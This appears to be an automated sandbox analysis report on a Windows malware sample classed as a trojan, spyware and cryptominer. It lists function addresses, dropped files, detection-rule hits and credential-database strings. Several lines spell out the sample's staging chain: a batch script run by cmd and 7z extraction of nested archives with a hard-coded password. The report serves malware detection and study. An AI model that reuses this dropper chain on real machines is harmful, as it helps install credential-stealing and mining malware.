                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0009E75B0_2_0009E75B
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000CCF930_2_000CCF93
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0007EFD70_2_0007EFD7
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000F60503_2_000F6050
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000D80703_2_000D8070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000A28803_2_000A2880
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0007F0C03_2_0007F0C0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000D19003_2_000D1900
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000B19103_2_000B1910
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000B89303_2_000B8930
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000BE1503_2_000BE150
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000ED1703_2_000ED170
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000CC1903_2_000CC190
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000AC9D03_2_000AC9D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000791E03_2_000791E0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000972103_2_00097210
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000E4A103_2_000E4A10
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000A22203_2_000A2220
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000F32A03_2_000F32A0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0011FAA93_2_0011FAA9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00068AD33_2_00068AD3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000FCAD03_2_000FCAD0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000BA2E03_2_000BA2E0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000D3B003_2_000D3B00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B903_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000983903_2_00098390
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00092B903_2_00092B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000A9C003_2_000A9C00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00115C093_2_00115C09
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_001084503_2_00108450
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00098CB03_2_00098CB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0009ECD03_2_0009ECD0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00066CE33_2_00066CE3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0009CCE03_2_0009CCE0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000D75103_2_000D7510
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0008D5B03_2_0008D5B0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000F46903_2_000F4690
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000F06D03_2_000F06D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00092F003_2_00092F00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00054F203_2_00054F20
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000B3F303_2_000B3F30
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00062FB03_2_00062FB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000ADFE03_2_000ADFE0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_000B47E03_2_000B47E0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004400D03_2_004400D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004208903_2_00420890
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004361303_2_00436130
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004119353_2_00411935
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040F2703_2_0040F270
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00440A003_2_00440A00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00438AB03_2_00438AB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004253903_2_00425390
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043FC803_2_0043FC80
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00435D803_2_00435D80
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042AEDB3_2_0042AEDB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004190503_2_00419050
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004098623_2_00409862
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004050703_2_00405070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043E0703_2_0043E070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004010003_2_00401000
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004238103_2_00423810
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042D8363_2_0042D836
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042C0813_2_0042C081
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042B8BC3_2_0042B8BC
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042C1443_2_0042C144
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042C1563_2_0042C156
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004231583_2_00423158
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043E1003_2_0043E100
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042C1073_2_0042C107
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040B1103_2_0040B110
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004071103_2_00407110
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043F1203_2_0043F120
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040A1303_2_0040A130
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041F1C13_2_0041F1C1
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004259FA3_2_004259FA
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004471893_2_00447189
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041E1903_2_0041E190
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004399903_2_00439990
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040D9A03_2_0040D9A0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004039B03_2_004039B0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004272603_2_00427260
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004012773_2_00401277
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00409AF73_2_00409AF7
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041928C3_2_0041928C
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041C2B43_2_0041C2B4
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00417B7E3_2_00417B7E
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004173003_2_00417300
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00407B103_2_00407B10
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00424B103_2_00424B10
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004013193_2_00401319
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00425B233_2_00425B23
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00422BC93_2_00422BC9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00447BDA3_2_00447BDA
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00426BF03_2_00426BF0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004123F73_2_004123F7
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004263FF3_2_004263FF
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004243963_2_00424396
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043DBA03_2_0043DBA0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004403B03_2_004403B0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004214403_2_00421440
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043EC523_2_0043EC52
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041D4603_2_0041D460
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042D47B3_2_0042D47B
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00427C003_2_00427C00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00430C1A3_2_00430C1A
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040BC203_2_0040BC20
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004354C03_2_004354C0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004084D03_2_004084D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040AC803_2_0040AC80
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043EC803_2_0043EC80
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040ED403_2_0040ED40
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043ED503_2_0043ED50
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00418D343_2_00418D34
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004345D13_2_004345D1
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0040A5F03_2_0040A5F0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043A5803_2_0043A580
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00434D963_2_00434D96
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00429DA03_2_00429DA0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042F5B03_2_0042F5B0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00421DB43_2_00421DB4
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041DE403_2_0041DE40
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041C64E3_2_0041C64E
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0043EE603_2_0043EE60
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041EE163_2_0041EE16
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004406C03_2_004406C0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004426C83_2_004426C8
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042EE853_2_0042EE85
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0042868E3_2_0042868E
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041474F3_2_0041474F
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_004357203_2_00435720
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00408F303_2_00408F30
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00419F353_2_00419F35
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00438FC03_2_00438FC0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_0041A7803_2_0041A780
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00436F893_2_00436F89
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00405BFC9_2_00405BFC
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040B0E09_2_0040B0E0
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040B0E49_2_0040B0E4
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004199739_2_00419973
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040A9009_2_0040A900
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040A2709_2_0040A270
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040AC209_2_0040AC20
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00409C209_2_00409C20
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040D4809_2_0040D480
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040ED009_2_0040ED00
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00409DD09_2_00409DD0
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004196019_2_00419601
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004196DB9_2_004196DB
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00418F409_2_00418F40
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FBF13E13_2_00FBF13E
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FB24C013_2_00FB24C0
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FB545813_2_00FB5458
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FB47AC13_2_00FB47AC
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FD881713_2_00FD8817
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FA0DCC13_2_00FA0DCC
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F9F1B413_2_00F9F1B4
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F9B11413_2_00F9B114
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FAC27813_2_00FAC278
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FC257813_2_00FC2578
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FD352813_2_00FD3528
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FC066E13_2_00FC066E
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FBD66C13_2_00FBD66C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FAD85813_2_00FAD858
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FC79DC13_2_00FC79DC
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FC99B813_2_00FC99B8
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FD49A513_2_00FD49A5
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FB694C13_2_00FB694C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FDDA3013_2_00FDDA30
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FCFA0C13_2_00FCFA0C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FA8CA813_2_00FA8CA8
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FA7C6813_2_00FA7C68
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FDDC1113_2_00FDDC11
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FDDD0013_2_00FDDD00
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FB6E0813_2_00FB6E08
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FAAF5813_2_00FAAF58
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F98F1813_2_00F98F18
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E128026_2_004E1280
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004E542426_2_004E5424
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004F122C26_2_004F122C
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004EDA2026_2_004EDA20
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004EDEB826_2_004EDEB8
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004F134C26_2_004F134C
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 26_2_004F272D26_2_004F272D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_012DF2E428_2_012DF2E4
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe 35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: String function: 00416F80 appears 57 times
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: String function: 00117F5D appears 34 times
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: String function: 00112568 appears 44 times
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: String function: 0040C6B0 appears 48 times
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: String function: 0010B9A0 appears 98 times
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: String function: 004E2330 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: String function: 004029A6 appears 44 times
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 136
                  Source: winlogson.exe.28.drStatic PE information: Number of sections : 11 > 10
                  Source: winlogson.exe.28.drStatic PE information: No import functions for PE file found
                  Source: winlogson.exe.28.drStatic PE information: Data appended to the last section found
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593192466.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStatPlus6.exe0 vs PqSIlYOaIF.exe
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1557860288.0000000005A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStatPlus6.exe0 vs PqSIlYOaIF.exe
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593149411.00000000057A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStatPlus6.exe0 vs PqSIlYOaIF.exe
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593257030.0000000005723000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStatPlus6.exe0 vs PqSIlYOaIF.exe
                  Source: PqSIlYOaIF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0000001A.00000002.1666398916.000000000063A000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: Process Memory Space: Installer.exe PID: 7868, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: PqSIlYOaIF.exeStatic PE information: Section: .open ZLIB complexity 1.0003382863562091
                  Source: WinRing0x64.sys.28.drBinary string: \Device\WinRing0_1_2_0
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@59/48@3/4
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,9_2_00409606
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F9AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_00F9AC74
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00FA1D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,13_2_00FA1D04
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_0040122A GetDiskFreeSpaceExW,SendMessageW,9_2_0040122A
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00436130 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00436130
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,9_2_004020BF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7784
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile created: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                  Source: PqSIlYOaIF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407530093.00000000056E5000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407434193.0000000005704000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1422651570.00000000056F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: PqSIlYOaIF.exeReversingLabs: Detection: 60%
                  Source: PqSIlYOaIF.exeVirustotal: Detection: 29%
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile read: C:\Users\user\Desktop\PqSIlYOaIF.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PqSIlYOaIF.exe "C:\Users\user\Desktop\PqSIlYOaIF.exe"
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Users\user\Desktop\PqSIlYOaIF.exe "C:\Users\user\Desktop\PqSIlYOaIF.exe"
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 136
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe "C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe"
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextracted
